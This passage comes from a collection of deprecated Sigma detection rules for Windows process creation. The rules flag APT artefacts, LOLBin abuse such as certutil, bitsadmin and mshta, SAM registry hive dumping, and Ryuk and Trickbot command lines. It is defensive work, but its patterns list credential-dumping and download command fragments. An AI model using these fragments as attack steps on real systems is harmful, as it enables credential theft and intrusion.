    "content": "title: GALLIUM Artefacts\nid: 18739897-21b1-41da-8ee4-5b786915a676\nrelated:\n    - id: 440a56bf-7873-4439-940a-1c8a671073c2\n      type: derived\nstatus: deprecated\ndescription: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.\nreferences:\n    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)\nauthor: Tim Burrell\ndate: 2020/02/07\nmodified: 2023/03/09\ntags:\n    - attack.credential_access\n    - attack.t1212\n    - attack.command_and_control\n    - attack.t1071\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    legitimate_process_path:\n        Image|contains:\n            - ':\\Program Files(x86)\\'\n            - ':\\Program Files\\'\n    legitimate_executable:\n        Hashes|contains: 'SHA1=e570585edc69f9074cb5e8a790708336bd45ca0f'\n    condition: legitimate_executable and not legitimate_process_path\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_hurricane_panda.yml",
    "content": "title: Hurricane Panda Activity\nid: 0eb2107b-a596-422e-b123-b389d5594ed7\nstatus: deprecated\ndescription: Detects Hurricane Panda Activity\nreferences:\n    - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019/03/04\nmodified: 2023/03/10\ntags:\n    - attack.privilege_escalation\n    - attack.g0009\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n            - 'localgroup'\n            - 'admin'\n            - '/add'\n        - CommandLine|contains: '\\Win64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml",
    "content": "title: Lazarus Activity Apr21\nid: 4a12fa47-c735-4032-a214-6fab5b120670\nstatus: deprecated\ndescription: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity\nreferences:\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/\nauthor: Bhabesh Raj\ndate: 2021/04/20\nmodified: 2023/03/10\ntags:\n    - attack.g0032\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - 'mshta' # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3\n            - '.zip'\n    selection_2:\n        ParentImage: 'C:\\Windows\\System32\\wbem\\wmiprvse.exe' # Covered by 8a582fe2-0882-4b89-a82a-da6b2dc32937\n        Image: 'C:\\Windows\\System32\\mshta.exe'\n    selection_3:\n        ParentImage|contains: ':\\Users\\Public\\'\n        Image: 'C:\\Windows\\System32\\rundll32.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Should not be any false positives\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_lazarus_loader.yml",
    "content": "title: Lazarus Loaders\nid: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e\nstatus: deprecated\ndescription: Detects different loaders as described in various threat reports on Lazarus group activity\nreferences:\n    - https://www.hvs-consulting.de/lazarus-report/\n    - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2020/12/23\nmodified: 2023/03/10\ntags:\n    - attack.g0032\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd1:\n        CommandLine|contains|all:\n            - 'cmd.exe /c '\n            - ' -p 0x'\n    selection_cmd2:\n        CommandLine|contains:\n            - 'C:\\ProgramData\\'\n            - 'C:\\RECYCLER\\'\n    selection_rundll1:\n        CommandLine|contains|all:\n            - 'rundll32.exe '\n            - 'C:\\ProgramData\\'\n    selection_rundll2:\n        CommandLine|contains:\n            - '.bin,'\n            - '.tmp,'\n            - '.dat,'\n            - '.io,'\n            - '.ini,'\n            - '.db,'\n    condition: ( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_muddywater_dnstunnel.yml",
    "content": "title: DNS Tunnel Technique from MuddyWater\nid: 7454df60-1478-484b-810d-bff5d0ba6d4b\nstatus: deprecated\ndescription: Detecting DNS tunnel activity for Muddywater actor\nreferences:\n    - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/\n    - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html\nauthor: '@caliskanfurkan_'\ndate: 2020/06/04\nmodified: 2023/03/10\ntags:\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        ParentImage|endswith: '\\excel.exe'\n        CommandLine|contains: 'DataExchange.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_ta505_dropper.yml",
    "content": "title: TA505 Dropper Load Pattern\nid: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4\nstatus: deprecated\ndescription: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents\nreferences:\n    - https://twitter.com/ForensicITGuy/status/1334734244120309760\nauthor: Florian Roth (Nextron Systems)\ndate: 2020/12/08\nmodified: 2023/04/05\ntags:\n    - attack.execution\n    - attack.g0092\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\wmiprvse.exe'\n    selection_mshta:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'mshta.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml",
    "content": "title: File Download Via Bitsadmin To An Uncommon Target Folder\nid: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248\nstatus: deprecated\ndescription: Detects usage of bitsadmin downloading a file to uncommon target folder\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_folder:\n        CommandLine|contains:\n            - '%AppData%'\n            - '%temp%'\n            - '%tmp%'\n            - '\\AppData\\Local\\'\n            - 'C:\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_certutil_susp_execution.yml",
    "content": "title: Suspicious Certutil Command Usage\nid: e011a729-98a6-4139-b5c4-bf6f6dd8239a\nstatus: deprecated\ndescription: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code\nreferences:\n    - https://twitter.com/JohnLaTwC/status/835149808817991680\n    - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/\n    - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\nauthor: Florian Roth (Nextron Systems), juju4, keepwatch\ndate: 2019/01/16\nmodified: 2023/02/15\ntags:\n    - attack.defense_evasion\n    - attack.t1140\n    - attack.command_and_control\n    - attack.t1105\n    - attack.s0160\n    - attack.g0007\n    - attack.g0010\n    - attack.g0045\n    - attack.g0049\n    - attack.g0075\n    - attack.g0096\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -decode '\n            - ' -decodehex '\n            - ' -urlcache '\n            - ' -verifyctl '\n            - ' -encode '\n            - ' -exportPFX '\n            - ' /decode '\n            - ' /decodehex '\n            - ' /urlcache '\n            - ' /verifyctl '\n            - ' /encode '\n            - ' /exportPFX '\n    condition: all of selection_*\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_cmd_read_contents.yml",
    "content": "title: Read and Execute a File Via Cmd.exe\nid: 00a4bacd-6db4-46d5-9258-a7d5ebff4003\nstatus: deprecated\ndescription: Detect use of \"/R <\" to read and execute a file via cmd.exe\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md\nauthor: frack113\ndate: 2022/08/20\nmodified: 2023/03/07\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_read:\n        - ParentCommandLine|contains|all:\n            - 'cmd'\n            - '/r '\n            - '<'\n        - CommandLine|contains|all:\n            - 'cmd'\n            - '/r '\n            - '<'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_cmd_redirect_to_stream.yml",
    "content": "title: Cmd Stream Redirection\nid: 70e68156-6571-427b-a6e9-4476a173a9b6\nstatus: deprecated\ndescription: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt\nauthor: frack113\ndate: 2022/02/04\nmodified: 2023/03/07\ntags:\n    - attack.defense_evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '> '\n            - ':'\n    filter:\n        CommandLine|contains: ' :\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_credential_acquisition_registry_hive_dumping.yml",
    "content": "title: Credential Acquisition via Registry Hive Dumping\nid: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0\nstatus: deprecated\ndescription: Detects Credential Acquisition via Registry Hive Dumping\nreferences:\n    - https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html\nauthor: Tim Rauch\ndate: 2022/10/04\nmodified: 2023/02/06\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_2:\n        CommandLine|contains:\n            - ' save '\n            - ' export '\n    selection_3:\n        CommandLine|contains:\n            - 'hklm\\sam'\n            - 'hklm\\security'\n            - 'HKEY_LOCAL_MACHINE\\SAM'\n            - 'HKEY_LOCAL_MACHINE\\SECURITY'\n    condition: all of selection_*\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_cscript_vbs.yml",
    "content": "title: Visual Basic Script Execution\nid: 23250293-eed5-4c39-b57a-841c8933a57d\nstatus: deprecated\ndescription: Adversaries may abuse Visual Basic (VB) for execution\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md\nauthor: frack113\ndate: 2022/01/02\nmodified: 2023/03/06\ntags:\n    - attack.execution\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exe:\n        - OriginalFileName:\n            - 'cscript.exe'\n            - 'wscript.exe'\n        - Image|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    selection_script:\n        CommandLine|contains: '.vbs'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml",
    "content": "title: Execution via MSSQL Xp_cmdshell Stored Procedure\nid: 344482e4-a477-436c-aa70-7536d18a48c7\nrelated:\n    - id: d08dd86f-681e-4a00-a92c-1db218754417\n      type: derived\n    - id: 7f103213-a04e-4d59-8261-213dddf22314\n      type: derived\nstatus: deprecated\ndescription: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html\nauthor: Tim Rauch\ndate: 2022/09/28\nmodified: 2023/03/06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_parent:\n        ParentImage|endswith: '\\sqlservr.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_filefix_browsers.yml",
    "content": "title: FileFix - Suspicious Child Process from Browser File Upload Abuse\nid: 4be03877-d5b6-4520-85c9-a5911c0a656c\nstatus: deprecated\ndescription: |\n    Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the \"FileFix\" social engineering technique,\n    where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.\n    The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.\nreferences:\n    - https://mrd0x.com/filefix-clickfix-alternative/\nauthor: 0xFustang\ndate: 2025-06-26\nmodified: 2025-11-24\ntags:\n    - attack.execution\n    - attack.t1204.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cmd.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n        CommandLine|contains: '#'\n    condition: selection\nfalsepositives:\n    - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_indirect_cmd.yml",
    "content": "title: Indirect Command Execution\nid: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\nstatus: deprecated\ndescription: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019/10/24\nmodified: 2023/01/04\ntags:\n    - attack.defense_evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\pcalua.exe'\n            - '\\forfiles.exe'\n    condition: selection\nfields:\n    - ComputerName\n    - User\n    - ParentCommandLine\n    - CommandLine\nfalsepositives:\n    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.\n    - Legitimate usage of scripts.\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_indirect_command_execution_forfiles.yml",
    "content": "title: Indirect Command Exectuion via Forfiles\nid: a85cf4e3-56ee-4e79-adeb-789f8fb209a8\nrelated:\n    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\n      type: obsolete\nstatus: deprecated\ndescription: Detects execition of commands and binaries from the context of \"forfiles.exe\". This can be used as a LOLBIN in order to bypass application whitelisting.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a\n    - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/\nauthor: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2022/10/17\nmodified: 2023/01/04\ntags:\n    - attack.defense_evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\forfiles.exe'\n    selection_c:\n        ParentCommandLine|contains:\n            - ' /c '\n            - ' -c '\n    selection_p:\n        ParentCommandLine|contains:\n            - ' /p '\n            - ' -p '\n    selection_m:\n        ParentCommandLine|contains:\n            - ' /m '\n            - ' -m '\n    filter:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'xcopy'\n            - 'cmd /c del'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_invoke_obfuscation_via_rundll.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER\nid: 056a7ee1-4853-4e67-86a0-3fd9ceed7555\nstatus: deprecated\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/18\nmodified: 2023/02/21\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32\nid: 36c5146c-d127-4f85-8e21-01bf62355d5a\nstatus: deprecated\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nikita Nazarov, oscd.community\ndate: 2019/10/08\nmodified: 2022/12/30\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        CommandLine|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbas_execution_of_wuauclt.yml",
    "content": "title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL\nid: ba1bb0cb-73da-42de-ad3a-de10c643a5d0\nstatus: experimental\ndescription: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.\nreferences:\n    - https://dtm.uk/wuauclt/\nauthor: Sreeman\ndate: 2020/10/29\nmodified: 2022/05/27\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'wuauclt.exe'\n            - '/UpdateDeploymentProvider'\n            - '/Runhandlercomserver'\n    filter:\n        CommandLine|contains:\n            - 'wuaueng.dll'\n            - 'UpdateDeploymentProvider.dll /ClassId'\n    condition: selection and not filter\nfalsepositives:\n    - Wuaueng.dll which is a module belonging to Microsoft Windows Update.\nfields:\n    - CommandLine\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.execution\n    - attack.t1218\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbin_findstr.yml",
    "content": "title: Abusing Findstr for Defense Evasion\nid: bf6c39fc-e203-45b9-9538-05397c1b4f3f\nstatus: deprecated\ndescription: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Findstr/\n    - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: 'Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali'\ndate: 2020/10/05\nmodified: 2022/10/12\ntags:\n    - attack.defense_evasion\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr:\n        - CommandLine|contains: findstr\n        - Image|endswith: 'findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli_download_1:\n        CommandLine|contains:\n            - ' /v '\n            - ' -v '\n    selection_cli_download_2:\n        CommandLine|contains:\n            - ' /l '\n            - ' -l '\n    selection_cli_creds_1:\n        CommandLine|contains:\n            - ' /s '\n            - ' -s '\n    selection_cli_creds_2:\n        CommandLine|contains:\n            - ' /i '\n            - ' -i '\n    condition: selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)\nfalsepositives:\n    - Administrative findstr usage\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbin_office.yml",
    "content": "title: Suspicious File Download Using Office Application\nid: 0c79148b-118e-472b-bdb7-9b57b444cc19\nstatus: test\ndescription: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\n    - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191\nauthor: Beyu Denis, oscd.community\ndate: 2019/10/26\nmodified: 2023/02/04\ntags:\n    - attack.command_and_control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\excel.exe'\n        CommandLine|contains: 'http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbin_rdrleakdiag.yml",
    "content": "title: Process Memory Dumped Via RdrLeakDiag.EXE\nid: 6355a919-2e97-4285-a673-74645566340d\nstatus: deprecated\ndescription: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/01/04\nmodified: 2023/04/24\ntags:\n    - attack.defense_evasion\n    - attack.t1036\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\rdrleakdiag.exe'\n        CommandLine|contains: '/fullmemdmp'\n    selection2:\n        CommandLine|contains|all:\n            - '/fullmemdmp'\n            - ' /o '\n            - ' /p '\n    condition: selection1 or selection2\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbins_by_office_applications.yml",
    "content": "title: New Lolbin Process by Office Applications\nid: 23daeb52-e6eb-493c-8607-c4f0246cb7d8\nstatus: deprecated\ndescription: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\n    - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml\n    - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A\n    - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set\nauthor: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)'\ndate: 2021/08/23\nmodified: 2023/02/04\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: add more LOLBins to the rules logic of your choice.\n    selection:\n        Image|endswith:\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\msiexec.exe'\n            - '\\mshta.exe'\n            - '\\verclsid.exe'\n            - '\\msdt.exe'\n            - '\\control.exe'\n            - '\\msidb.exe'\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\eqnedt32.exe'\n            - '\\visio.exe'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_mal_ryuk.yml",
    "content": "title: Ryuk Ransomware Command Line Activity\nid: 0acaad27-9f02-4136-a243-c357202edd74\nrelated:\n    - id: c37510b8-2107-4b78-aa32-72f251e7a844\n      type: similar\nstatus: deprecated\ndescription: Detects Ryuk Ransomware command lines\nreferences:\n    - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/\nauthor: Vasiliy Burov\ndate: 2019/08/06\nmodified: 2023/02/03\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: 'stop'\n    selection2:\n        CommandLine|contains:\n            - 'samss'\n            - 'audioendpointbuilder'\n            - 'unistoresvc_'\n    condition: all of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_malware_trickbot_recon_activity.yml",
    "content": "title: Trickbot Malware Reconnaissance Activity\nid: 410ad193-a728-4107-bc79-4419789fcbf8\nrelated:\n    - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\n      type: similar\nstatus: deprecated\ndescription: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.\nreferences:\n    - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\n    - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nauthor: David Burkett, Florian Roth\ndate: 2019/12/28\nmodified: 2023/04/28\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\cmd.exe'\n        Image|endswith: '\\nltest.exe'\n        CommandLine|contains: '/domain_trusts /all_trusts'\n    condition: selection\nfalsepositives:\n    - Rare System Admin Activity\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_mavinject_proc_inj.yml",
    "content": "title: MavInject Process Injection\nid: 17eb8e57-9983-420d-ad8a-2c4976c22eb8\nstatus: deprecated\ndescription: Detects process injection using the signed Windows tool Mavinject32.exe\nauthor: Florian Roth (Nextron Systems)\nreferences:\n    - https://twitter.com/gN3mes1s/status/941315826107510784\n    - https://reaqta.com/2017/12/mavinject-microsoft-injector/\n    - https://twitter.com/Hexacorn/status/776122138063409152\ndate: 2018/12/12\nmodified: 2022/12/19\ntags:\n    - attack.t1055.001\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' /INJECTRUNNING '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_msdt_diagcab.yml",
